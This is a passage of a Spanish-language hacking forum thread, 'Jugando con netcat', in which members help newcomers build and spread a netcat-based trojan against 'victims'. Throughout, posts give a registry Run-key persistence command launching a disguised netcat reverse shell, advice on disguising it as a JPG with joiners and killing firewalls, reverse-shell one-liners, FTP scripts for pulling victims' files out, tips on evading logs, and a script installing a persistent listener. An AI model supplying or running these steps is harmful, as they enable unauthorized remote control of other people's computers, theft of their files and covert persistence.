No detecta a ninguno de los dos como troyanos... segun las bases de datos de antivirus son o rootkits (No se porque pero bueh)... o hacking tools (ahi me gusto más el nombre), o "software potencialmente no deseado".

Por otro lado las empresas antivirus crean defensas contra lo que ya conocen, y nunca podran detectar nuevas tecnologias de hacking. Un troyano no es un programa que le dice al PC "Hey, soy un troyano, dame el control del sistema", es una compleja maraña de codigo lista para ejecutarse y dejarnos con el control del sistema ante la primera posibilidad.

Lee al respecto, lee mil veces antes de hacer un pregunta que Google te respondera contento.


Título: Re: Jugando con netcat
Publicado por: snitch en 4 Abril 2008, 05:31 am
Hola soy muy newbee en esto probe el tuto 1 jugando con Netcat, lo segui y lo hice todo bien aparentemente pero cuando ejecuto el NC para escuchar el puerto 80 me aparece este cartel luego de escuchar un tiempo. yo tengo un servicio de internet con IP Dinamica pero digamos la carnada por asi decirlo fue creada sin desloguearme de la cuenta de servicio de internet o sea tenia la IP que puse en la carnada

(http://img385.imageshack.us/img385/8713/01va8.th.jpg)
http://img385.imageshack.us/my.php?image=01va8.jpg (http://img385.imageshack.us/my.php?image=01va8.jpg)

mis dudas son las siguientes:

1) Que significa ese cartel ? y como puedo conectarme con la victima ?
2) Como puedo solucionar el tema de mi IP Dinamica para no tener que crear la carnada en el momento con la IP que tengo en uso ?. Se que en unas respuestas anteriores a esta publicaron algo de IP Dinamica con la pagina http://www.no-ip.com/ (http://www.no-ip.com/) pero no entiendo a que se refiere, me podrian explicar con mas detalles que soy nuevo ?
3) Si mi victima tiene IP Dinamica como hago ?
5) Otra duda que me surgio si hice bien o no es la siguiente. Cuando estoy creando el SFX con el WinRar la linea de comandos que se escribe en “Ejecutar antes de la extracción”  que es %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul yo la copie y la pegue, en el turorial decia pegarla en una sola linea ya que esta tenia 3 yo, entre linea y linea pegada, no tabule para darle un espacio, eso me influye en la ejecucion del comando ? Le tendria que haber puesto espacio ??
5) Hay problemas con el Firewall de Windows cuando mi victima ejecuta la carnada ??
6) Otra cosa que quiero hacer es la siguiente: pasarle una foto a la victima y esta este envevida por asi decirlo de la carnada. Tengo entendido que esto se hace con un joiner, pero mi pregunta es esta yo con el joiner adjunto la foto, la carnada, y el stub tengo entendido, entonces cuando la victima habre ese archivo (que me gustaria que sea un .jpg con icono de JPG y no un .exe) en teoria se le abririan los tres archivos ? Se le abriria la carnada que seria un pantallazo de DOS, se le habriria la foto y el stub ??  El stub habre la foto y la carnada esto es asi ??
7) Algun Joiner que conozcan que me haga un .jpg que sea un paquete de archivos y estos se ejecuten al abrir el jpg ?
8) Alguien me puede decir donde bajar el Small Joiner o pasarmelo publicado en este foro que me parece que cumple esta funcion ?

El metodo que esta usando para pasarle la carnada a los demas era cambiarle el icono al .exe por el de JPG y renombrarlo como "colita.exe.jpg" por ejemplo, pero MSN no me lo dejaba mandar por ser un .exe y se lo tenia que mandar en un ZIP como un paquete de fotos con este en el medio, lo cual reduce las posibilidades de que lo habran.

Bueno muchas gracias, ustedes me diran, espero sus respuestas
Disculpenme si hice demasiadas preguntas, es que me surgen y soy muy dubitativo.

Gracias...   :rolleyes:


Título: Re: Jugando con netcat
Publicado por: snitch en 7 Abril 2008, 19:41 pm
Alguien me puede responder ??

Gracias...


Título: Re: Jugando con netcat
Publicado por: elmeister en 8 Abril 2008, 16:50 pm
1) Eso es por usar el puerto 80, mapea otro puerto en tu router que no sea ese, que es el que se usa para internet (ver paginas web quiero decir), y usalo para la conexión

2)Busca, en este y otros foros encontraras manuales sobre no-ip

3)Usa conexion inversa, en la primera parte del tutorial verás como hacerlo (la victima se conecta a ti en lugar de tu a la victima)

4) Tu copia y pega, eso es que no hay bastante espacio por el tamaño de letra que tengas configurado en tu navegador y por tu resolución del monitor como para mostrarlo en una linea, pero como si estuvies en una linea.

5)No lo se cierto, pero puedes unirlo a un FW-Killer para que cierre el firewall y luego abrá el netcat (o carnada si has puesto el mismo nombre que en el tutorial, que no es necesario)

6) Creo que no he entendido bien, pero si es lo que pienso, el Stub se pone de por medio entre los archivos(esto lo hace automáticamente el joiner), y los ejecuta, el Stub se ejecuta para saber que hacer con los archivos que has unido con el joiner.

7)Me temo que no se puede más que con el extension creator o extension maker (no recuerdo cual de los dos nombres era), tendrás que comprimirlo y enviarlo.

8)Mira en el foro, sección troyanos y virus.

P.D: tendrás que aprender por ti mismo, busca, aquí en el foro hay mucho material, si no , usa el google, que para eso está, reguntando aprenderás menos que buscando, probando y equivocandote, aunque, si eres un principiante, habrá que ayudar, digo yo.

P.D 2: Nunca des prisas, esto es un foro, no un chat, la gente responde cuando vea que han dicho algo, y si quiere responder


Título: Re: Jugando con netcat
Publicado por: SubZ3r0- en 9 Abril 2008, 15:48 pm
tngo unas dudas sobre esto..

1-¿¿que diferencia hay de que se conecte ati la victima a tu a ella ninguna???
2-¿¿ambos netcats tienen que tener la misma version o pueden ser diferentes???
3-¿¿cual es el comando para subir un archivo de una shell a otra?
4-¿¿cuando ponemos nc es porque nc es el nombre que le emos puesto al netcat??
si por ejemplo yo le subo a la vicitma el netcat pero con el nombre "pipas" el enve de poner nc -lvvp 8080 -e cmd.exe tendria que poner "pipas" -lvvp 8080 -e cmd.exe (sin las comillas claro.)
5-¿¿el puerto por el cual nos conectamos a ella(directa)ella tiene que tener el puerto abierto??y si es inversa(ella se conecta a nosotros)tengo que tener el puerto yo abierto??
6-¿¿como sabes o diferenciamos la conexion inversa de la directa y viceversa??? depende quien tenga la -l(listen)??


venga saludos y thx.


PD:la que ha posteado martin fierro es directa o inversa??.


Título: Re: Jugando con netcat
Publicado por: Novlucker en 9 Abril 2008, 16:02 pm
1- Con la conexion inversa puedes saltarte un router, es decir, puedes conectar a una pc en lan
También en algunos casos el firewall
2- No tengo idea pero no debería de haber problemas, igualemente es recomendable utilizar la misma versión, si tienes una para que enviar otra?  :-\
3- Te recomiendo leer este (http://foro.elhacker.net/index.php/topic,200794.0.html) post
4- Exacto, es por eso que en ejemplo de Jugando con netcat v1.1 dice iexplorer.exe -d -e cmd.exe 127.0.0.1 80 en lugar de nc -d -e cmd.exe 127.0.0.1 80
5- Si, debe de estar abierto
En conexion directa si la persona tiene un router de por medio también tiene que estar mapeado el puerto
Y en el caso de conexion inversa eres tu quien debe de tenerlo mapeado en el caso de tener router
6- Exacto, depende de quien tenga el listen, la de Martín Fierro es directa

Saludos

[Modifico]:  Me faltó decir que con la conexión inversa solucionas el problema de que la victima tenga ip dinámica, y en caso de que quién tenga ip dinámica seas tu te es más sencillo configurarte una cuenta no-ip  ;)


Título: Re: Jugando con netcat
Publicado por: snitch en 9 Abril 2008, 20:18 pm
Gracias Elmeister !!!!!   Ya se que no es un chat es solo que habian pasado unos dias y nadie me respondia porke lo que pense que nadie iba a responder porke el post tenia muchas respuestas.

Lo voy a probar......  :D


Título: Re: Jugando con netcat
Publicado por: SubZ3r0- en 10 Abril 2008, 01:27 am
alguien me puede decir si he cometido un error o esque la victima que e elejido no cumple algun requisito???

o algun fallo o algo...

porque lo e intentao y no e podio (lo e probao con una victima troyanizada)

aki os dejo la screen:

http://img145.imageshack.us/my.php?image=nuevoimagendemapadebitsba9.png


Título: Re: Jugando con netcat
Publicado por: Novlucker en 10 Abril 2008, 01:33 am
De nada  :¬¬

Seguramente la otra persona tiene un firewall, esta detras de un router, o bien tiene AV y ha detectado el nc

Saludos


Título: Re: Jugando con netcat
Publicado por: metoded789 en 10 Abril 2008, 21:08 pm
Muy interesante tu post , bueno soy nuevo y espero aprender harto del mundo hack !


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 11 Abril 2008, 01:55 am
En Teoria deberia de funcionar por el puerto 80 con todo y firewall :/

miren...

(http://max-deur.webcindario.com/dibs.JPG) (http://max-deur.webcindario.com/maxitos.JPG)


salu2


Título: Re: Jugando con netcat
Publicado por: Novlucker en 11 Abril 2008, 02:06 am
Es que es correcto, se supone que para que el firewall no cante, se pueden utilizar dos ventanas para el netcat, una en el puerto 80, y otra en el 25, uno para recibir, y otro para envíar, ya que esos sería puertos habilitados por defecto, tal y como hace tiempo lo posteo zhyzura en su Paper: Obtener shell con Netcat (http://foro.elhacker.net/index.php/topic,58032.0.html)

Saludos  ;)


Título: Re: Jugando con netcat
Publicado por: cker en 11 Abril 2008, 02:27 am
WHK te felicito
y a todos los demas que han enriquecido este tread, soy movato en esto, y aunque he bajado algunas herramientas nunca habia usado ninguna porque no se como, hasta que conoci este.
pero luego luego me atore desde poner el lgo o icono del i explorer intente copiarlo en bmap y otros pero no me resulto; baje el nc 1.0 par ver si asi pero tampoco ya lei dos veces todo y no encontre  los que ibas a poner . si me pudieran decir donde quedaron o como crear uno se los voy a agradecer
saludos
juan m.


Título: Re: Jugando con netcat
Publicado por: Novlucker en 11 Abril 2008, 02:34 am
Para crear iconos tienes una gran cantidad de utilidades en la web, basta con googlear un poco, pero igualmente..... porque es que no puedes cambiarlo?? te sale algún tipo de error??

Saludos


Título: Re: Jugando con netcat
Publicado por: elmeister en 11 Abril 2008, 07:37 am
lo que parece que dice es que no podía sacar el icono del internet explorer, si no me equivoco, el resource hacker puede sacar los iconos de un exe diferente al que estás editando y ponerlos en tu exe, aunque tambien lo puedes conseguir en formato .ico con el icon extractor, buscalo en google


Título: Re: Jugando con netcat
Publicado por: cker en 12 Abril 2008, 02:50 am
novlucker y elmesiter gracias por atender
para que se rian un  rato. les dire que lo que estaba haciendo era copiar la imagen del icono del explorer en word o photoshop y de alli queria introducirla al nc pero bueno; lo que pasa es que he tenido que aprender de los foros como este desde la dif. entre un bit y un byte.
gracias por su apoyo . ya baje un extractor de iconos y ya fabrique mi troyano ya lo tengo lsto en mi escritorio, pero ahora no se como se obtiene la direccion de la victima cuando estas chateando. ensaye usndo todas las opciones del netstat desde el DOS pero a lo mas que llegue es las direccines de los servidores y creo que no es suficiente, ojala y me puedan orientar.
saludos juan m.


Título: Re: Jugando con netcat
Publicado por: mastermoco en 12 Abril 2008, 09:08 am
mu bien explicado gracias


Título: Re: Jugando con netcat
Publicado por: Thylzos en 12 Abril 2008, 10:31 am
Vale, me acaba de surgir una duda respecto a la tercera práctica. ¿Qué pasa si la uso en Linux, hago que en vez de ejecutar cmd (como es lógico, no está en Linux :P), se ejecute un Eterm e ingreso a mi ordenador remotamente desde Windows?, gracias desde ya.


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 13 Abril 2008, 06:37 am
eterm pues funciona como consola, assi que no deberia de darte problemas, pero creo tienes que bajate le netcat para linux :/

salu2


Título: Re: Jugando con netcat
Publicado por: D4RIO en 16 Abril 2008, 14:59 pm
Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!


Título: Re: Jugando con netcat
Publicado por: pascal88 en 16 Abril 2008, 20:12 pm
Hola, me he leido todo el tutorial, pero aun asi consigo solucionar el problema que tengo, y es el siguiente:

Yo hago todo como dice desde el principio, todo igual, menos donde pone la ip de WHK, pues pongo la mia, la publica. Pues bien, luego cuando esta hecho el troyano, se lo paso a mi amigo, lo ejecuta, y pongo yo en ejecutar/cmd:

nc -vv -l -p 80  (intro)

y me sale una serie de cosas muy diferentes a lo que tenia que salir, es mas, me sale al principio la ip de WHK, la de 127.0.0.1, y yo no la puesto! que puedo hacer? otra de las veces me salio c:\windows>... pero era mi disco duro, porque registre y eran mis cosas!, que es lo que puedo hacer para acceder al disco duro de mi amigo??

Ni que decir tiene que mi amigo esta conforme, pues entre los dos estamos viendo esto.


Título: Re: Jugando con netcat
Publicado por: D4RIO en 17 Abril 2008, 01:02 am
No te transformes en un s|{rIpt kiddi3, estudia, razona, despues haces las cosas.

127.0.0.1 es tu propia makina, es el host local, o localhost, la manera con la que tu máquina se refiere a ella misma, y es igual con WHK que con vos.
Para conectarte de la manera que vos pones en tu makina, el troyano debería ejecutar:

nc -vv TU_IP 80

y listo... Si se te corta la conexión ya hablamos de otro tema, por ejemplo un firewall o un antivirus.

Lee y aprende que eslo que estás haciendondo. Protocolo TCP/IP, Sockets, etcétera...


Título: Re: Jugando con netcat
Publicado por: pascal88 en 17 Abril 2008, 09:14 am
Buenos dias, en primer lugar decir que mi anterior duda, ya esta resuelta mi pregunta ahora es la siguiente, ayer estuve hasta las tantas leyendo todos los post, quiza con el sueño no lo vi, pero no encuentro esto:

Una vez que yo entro y veo los titulos de las cosas que tiene la victima, puedo verlas? es decir, una vez que he visto que tiene un archivo word por ejemplo, puedo abrirlo para verlo yo? se que lo puedo abrir para que lo vea la victima, pero y verlo yo? se puede?
O puedo guardarlo en mi pc, para luego verlo yo cuando yo quiera? a que parte de jugando con Netcat pertenece esto?

Contestarme por favor, y si esta en el foro remitanme a la pagina adecuada, pues no la encuentro.

Muchisimas gracias! sois unos makinas!!


Joder, no veas lo que se aprende en este foro, antes ya aprendi sobre seguridad de redes inalambricas, y ahora esto, que me fascina aun mas.


Título: Re: Jugando con netcat
Publicado por: Novlucker en 17 Abril 2008, 13:23 pm
No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este (http://foro.elhacker.net/index.php/topic,200794.0.html) post  ;)

Saludos


Título: Re: Jugando con netcat
Publicado por: D4RIO en 19 Abril 2008, 05:53 am
Si podes ver los documentos... :¬¬

Documentos de texto: Necesitarás instalarle remotamente un programa de lectura de consola tal como ViM, o nano... se que hay versiones para Windows. El mismo cmd debería redireccionartelo a tu consola, a través de la red. Por lo menos asi lo he logrado yo. Entonces editaras el texto desde tu máquina... para que no te lies, ViM funcionaría de la misma manera que la shell, es decir que se ejecuta en la máquina de él y la entrada y salida estándar se desvían a tu máquina, por lo que ViM advertirá que la entrada NO es de un Terminal...

Documentos de tipos binarios: Digo así porque, por ejemplo... un documento de tipo HTML, por ejemplo, no es TXT pero sí es de texto, en cambio uno de Word es binario, y no lograrás editarlo de ésta manera... en ese caso es obligatoria la transferencia, para editarlo en tu casita... Hay otros medios para editarlo pero requerirían que hagas un programa que automatice el trabajo con archivos de Word sin abrir Word, para lo que te puede servir AutoIt, pero es más sencillo transferirlo y editarlo, para luego reemplazarlo.

Es decir... habría manera de editar todo tipo de archivos desde la consola, como no si en Linux los hay, pero no te lies demasiado, te conviene transferir los binarios.


Título: Re: Jugando con netcat
Publicado por: Thylzos en 19 Abril 2008, 12:17 pm
Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!

Ni de lejos... lo que quería era configurar mi sistema para que pueda acceder remotamente :P. Gracias, ahora ya sé qué me deba el error ;).


Título: Re: Jugando con netcat
Publicado por: Novlucker en 19 Abril 2008, 23:49 pm
Citar
Si podes ver los documentos...

Si bien se puede, igualmente se esta utilizando un programa externo  :¬¬

Además pasa muchas veces, que cuando se intenta utilizar un programa externo desde cmd con netcat, este se queda colgado....


Título: Re: Jugando con netcat
Publicado por: carlipus en 20 Abril 2008, 14:20 pm
Buenas, sabeis si obteniendo una shell con netcat se podria formatear el pc? no penseis mal !! jeje

Es que el pc de mi hermano necesita un formateo, y me gustaria hacerlo desde ms dos, y si puede ser, desde mi pc(obteniendo una shell con netcat, se podria)

Me gusta probrar cosas, pero antes decirme si se puede claro, jeje

Saludos


Título: Re: Jugando con netcat
Publicado por: pascal88 en 21 Abril 2008, 00:49 am
No, no es posible ver los documentos de la otra persona, porque tu estas conectado por consola, y para ver los demas documentos se utilizan programas externos...

Podrás verlos luego de habertelos pasado a tu pc  :P

Presta atención a este (http://foro.elhacker.net/index.php/topic,200794.0.html) post  ;)

Saludos

De nuevo te doy las gracias, pero comentarte que no me ha servido, pues tan solo consigo con eso, pasarme los archivos a mi pc, pero en blanco, es decir, por ejemplo, la "victima" tiene un documento word en el escritorio llamado: pepito, yo consigo recibir, un archivo word llamado pepito, pero en blanco.
Que es lo que hago mal? como puedo pasarme el archivo y verlo??


Título: Re: Jugando con netcat
Publicado por: pascal88 en 21 Abril 2008, 19:37 pm

8. Por último presionas en "OK"

Ufff... ahora que ya configuramos nuestro servidor FTP podemos hacer las transferencias de archivos... ¿como?... facil mi querido watson...

Desde tu shell crearemos un texto que nos permitirá ejecutar los comandos del FTP.

echo o >> ftp.txt
echo mi_ip >> ftp.txt
echo user >> ftp.txt     (Recuerda que lo vimos en el paso 1)
echo pass >> ftp.txt     (esto también lo vimos en el paso 3)
echo GET archivo >> ftp.txt
echo quit >> ftp.txt

El comando GET significa que le subirás un archivo y el comando PUT es porque le sacarás un archivo para ponerlo en tu pc. Puedes aplicar mas de uno como por ejemplo:


Ahora ejecutamos el FTP desde mi shell de la siguiente manera: ftp.exe -s:ftp.txt y bualá!...


Justamente despues de hacer eso, me pone que hay un error desconocido.
Quiza no lo ponga donde es, donde se pone eso, en la shell donde salen los datos de la victima o en la mia? es que no se que puede pasar!!! ayuda pleaseeee!!


Título: Re: Jugando con netcat
Publicado por: marlon_agz en 22 Abril 2008, 05:31 am
aqui mismo :xD

http://www.vulnwatch.org/netcat/nc111nt.zip


salu2


Título: Re: Jugando con netcat
Publicado por: D4RIO en 22 Abril 2008, 05:46 am
Mejor busca tutos sobre tcp/ip y transferencias de datos, y sockets... eso es lo que manejas desde nc, nada más, por eso lo usan los administradores de redes.


Título: Re: Jugando con netcat
Publicado por: pascal88 en 22 Abril 2008, 20:23 pm
Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??


Por favor, contestar!!

Gracias.


Título: Re: Jugando con netcat
Publicado por: drzboii94 en 22 Abril 2008, 21:44 pm
no entiendo cual archivo es que tengo que anadir  a .rrar


Título: Re: Jugando con netcat
Publicado por: elmeister en 22 Abril 2008, 22:07 pm
Hola, mirad, yo tengo un dominio de estos de iespana, entonces, digo, desde la shell de la victima, cojo y subo los archivos que quiera, y desde mi shell luego los veo.
Pero pasa una cosa, cuando pongo en la shell de la victima:

ftp 82.196...
(me pide usuario) y se lo pongo
pero sq, ahi se queda pensando un rato, y no sale nada, sq no me puedo conectar a mi servidor para subir algo, desde una shell remota??


Por favor, contestar!!

Gracias.

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código
  1. echo usuario>>script
  2. echo pass>>script
  3. echo ascii>>script
  4. echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script
  5. echo bye>>script
  6. start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul
  7. del script
  8.  

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script


Título: Re: Jugando con netcat
Publicado por: D4RIO en 22 Abril 2008, 22:16 pm
drzboii94:
Primero quemarse la cabeza y despues si preguntar... apuesto a que no leiste ni medio...sentate, perde una o dos horas en leer, y no nos hagas perder el tiempo a nosotros por vos: se menciono mil veces que es nc.exe, renombrado, cambiado, lo que quieras, de todas formas no es cosa de geeks... yo programo mis popias versiones.

pascal88:
Si usas un dominio en iespana con tus datoos te expones demasiado. yo uso una, pero anonima, entonces el es el que accede, y sube archivos por el ftp de iespana, y yo los descargo como si fuera un usuario comun... jeje. el tema es que encriptes bien el usuario y pass del ftp... no los vayas a incluir en el fuente o un dump bastaria para verlos...
a demas usa php para que la capacidad de bajar algunos archivos sea solo con un pass...xd
se creativo...


Título: Re: Jugando con netcat
Publicado por: drzboii94 en 22 Abril 2008, 22:34 pm
drzboii94:
Primero quemarse la cabeza y despues si preguntar... apuesto a que no leiste ni medio...sentate, perde una o dos horas en leer, y no nos hagas perder el tiempo a nosotros por vos: se menciono mil veces que es nc.exe, renombrado, cambiado, lo que quieras, de todas formas no es cosa de geeks... yo programo mis popias versiones.

pascal88:
Si usas un dominio en iespana con tus datoos te expones demasiado. yo uso una, pero anonima, entonces el es el que accede, y sube archivos por el ftp de iespana, y yo los descargo como si fuera un usuario comun... jeje. el tema es que encriptes bien el usuario y pass del ftp... no los vayas a incluir en el fuente o un dump bastaria para verlos...
a demas usa php para que la capacidad de bajar algunos archivos sea solo con un pass...xd
se creativo...

Lo ley entero pero lo que pasa es que mira lo que me sale despues que pongo
Citar
NC -VV -L -P 80

(http://img2.freeimagehosting.net/uploads/925343976f.jpg)


Título: Re: Jugando con netcat
Publicado por: pascal88 en 22 Abril 2008, 23:46 pm
Citar

usa el código siguiente, donde pone script dejalo tal cual, es un archivo que crearás y despues borrarás

Código
  1. echo usuario>>script
  2. echo pass>>script
  3. echo ascii>>script
  4. echo put [PON AQUI LA RUTA DEL ARCHIVO QUE QUIERES SUBIR]>>script
  5. echo bye>>script
  6. start ftp -s:script [aqui la direccion del servidor al que vas a subir el archivo]>nul
  7. del script
  8.  

repite el proceso por cada archivo, o añade varias lineas de echo put [archivo]>>script antes del echo bye>>script


perdona que sea tan pesao hombre, pero es que veras, desde la consola de mi pc pongo eso tal cual, es decir, en usuario y en pass no pongo mis datos, lo pongo igual que viene en tu post. y me sube el archivo!, pero desde la shell de la "victima" no lo sube tio! que hago?

Una ayudita porfavoooooo!!!
grasiasss


Título: Re: Jugando con netcat
Publicado por: vladimir_levin en 23 Abril 2008, 21:48 pm
muy buen manual completisimo y chidisimo  ;D ;D


Título: Re: Jugando con netcat
Publicado por: D4RIO en 24 Abril 2008, 23:15 pm
drzboii94:
Amigo decidite... tu post decia:
Citar
no entiendo cual archivo es que tengo que anadir  a .rrar

te respondi que leas y me pones:
Citar
Lo ley entero pero lo que pasa es que mira lo que me sale despues que pongo
Citar
NC -VV -L -P 80

y tu imagen...
¿Estas creando el RAR o intentando una conexion desastrosa?¿Porque no aparece localhost o 127.0.0.1 en ningun lado de tu salida?¿Sabes como funciona NetCat?¿Porque no intentas con un script Perl para ver si podes así, o te haces un programa en C++?

Esa es la cosa... no podes postear cada vez que haces un paso y no te sale... tenes que intentar resolverlo primero por vos mismo... GOOGLE!!!


Título: Re: Jugando con netcat
Publicado por: drzboii94 en 27 Abril 2008, 04:58 am
lol, Gracias por trarme de ayudar pero ya resolvi el problema hace ufff :rolleyes:


Título: Re: Jugando con netcat
Publicado por: vitaepe en 28 Abril 2008, 01:36 am
esta interesante el tema pero hice lo que mencionan en la primera parte en la consola de ubuntu
vitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

luego de eso hice un nmap al sistema
vitaepe@vitaepe-desktop:~$ nmap 192.168.1.34

Starting Nmap 4.20 ( http://insecure.org ) at 2008-04-27 18:08 PET
All 1697 scanned ports on 192.168.1.34 are closed
no abrio ningun puerto en mi ordenador, alguien sabe a que se debe?


Título: Re: Jugando con netcat
Publicado por: D4RIO en 28 Abril 2008, 03:30 am
Citar
vitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

Eso abre el 4455 a la escucha pero cmd.exe es el shell de Windows! En linux deberías poner "/bin/bash"...

Hiciste un escaneo con nmap y venis con un diagnostico totalmente errado, fruto de no hacer las pruevas que deberías... en pimer lugar nmap  tiene muchísimas opciones, pero así y todo no es ese el camino para ver si el puerto está abierto... para lo que más sirve nmap es para detección remota de SO.

Mira... hace "nc -z -vv 192.168.1.34 4443-4446" y vas a ver que no era como creias. O bien "nc -vv localhost 4455".

A demás si usaras -vv en el comando que indicas verías que sí está escuchando... si no lo hiciera mandaría un error.


Título: Re: Jugando con netcat
Publicado por: vitaepe en 28 Abril 2008, 04:09 am
vitaepe@vitaepe-desktop:~$ nc -z -vv 192.168.1.34 4443-4446
192.168.1.34: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.1.34] 4446 (?) : Connection refused
(UNKNOWN) [192.168.1.34] 4445 (?) : Connection refused
(UNKNOWN) [192.168.1.34] 4444 (?) : Connection refused
(UNKNOWN) [192.168.1.34] 4443 (?) : Connection refused
 sent 0, rcvd 0
vitaepe@vitaepe-desktop:~$ nc -vv localhost 4455
localhost [127.0.0.1] 4455 (?) : Connection refused
 sent 0, rcvd 0

Estos son los resultados, voy a seguir probando


Título: Re: Jugando con netcat
Publicado por: D4RIO en 28 Abril 2008, 05:48 am
Eso era mientras esto esta corriendo en otro terminal... :¬¬

Citar
vitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe

A demás, el nro de IP era el que usabas en ese entonces, ahora tenes que usar el que corresponda...

Yo no entiendo la gracia de hacer algo sin saber qué se está haciendo...


Título: Re: Jugando con netcat
Publicado por: vitaepe en 28 Abril 2008, 05:57 am
Yo no entiendo la gracia de hacer algo sin saber qué se está haciendo...
[/quote]

si te incomoda lo que digo, pues simple ignoralo pero estos comentarios, no ayudan si no incomodan, alguien que sea mas claro, mejor dicho que explique cual es mi error. ;D


Título: Re: Jugando con netcat
Publicado por: Compumdp en 28 Abril 2008, 17:29 pm
Hola, lei todo, hice todo, anda bien, pero tengo un problema, solo puedo acceder a la maquina cuando la victima clickea el archivo, despues cuando me desconecto no logro ingresar mas, hasta que la victima vuelva a clickear el archivo, estuve buscando sobre esto pero no encontre respuestas, si me pueden dar una mano, muchas gracias!


Título: Re: Jugando con netcat
Publicado por: ::Neo:: en 28 Abril 2008, 18:11 pm
ok, he troyanizado el netcat, pero cuando lo abro en otro pc, me sale el pestañeo del CMD y despues me sale un cartel de estos de error en el que pone: "Windows no puede encontrar el archivo "iexplore.exe". Asegurese de que la ruta y el nombre del archivo esta bien escrito y vuelva a intentarlo. Para buscar un archivo haga clic en inicio y luego buscar." e buscado por google y no encuentro la solucion, porfavor ayudenme :-(. gracias de antemano


Título: Re: Jugando con netcat
Publicado por: D4RIO en 28 Abril 2008, 20:02 pm
vitaepe:
Te lo explike perfectamente bien perono creo que en realidad sepas lo que haces.
Si ejecutas lo siguiente:
Citar
vitaepe@vitaepe-desktop:~$ nc
Cmd line: -l -p4455 -e cmd.exe
queda el 4455 a la escucha... (con el ignorantazo de que cmd.exe NO ES EL SHELL DE LINUX... pero bueh)
Lo ideal seria que pongas:
Código:
nc -l -vv -e /bin/bash -p 4455

Y mientras eso se esta ejecutando en un terminal abris otro y pones
Código:
nc -z -vv localhost 4443-4446

Pero si no lo entendes no tiene ninguna gracia, es más, yo te diria que no juegues con revolver si no sabes usar armas porque vas a terminar pegandote un tiro... yo te podria decir que te facilitas la vida poniendo esto en un script y ejecutandolo con bash:

Código
  1. #!/bin/bash
  2.  
  3. cat << EOF >> /etc/init.d/ncman.sh
  4. #!bin/bash
  5.  
  6. case $1 in
  7. start)
  8.    nc -l -vv -p 4455 &;
  9. ;;
  10. stop)
  11.    killall nc;
  12. ;;
  13. *)
  14.    echo "JoHoHo!";
  15. ;;
  16. esac
  17.  
  18. exit 0;
  19.  
  20. EOF
  21.  
  22. ln -s /etc/init.d/ncman.sh /etc/rc5.d/S99ncman;
  23. chmod +x /etc/init.d/ncman.sh;
  24.  
  25. exit 0;
  26.  

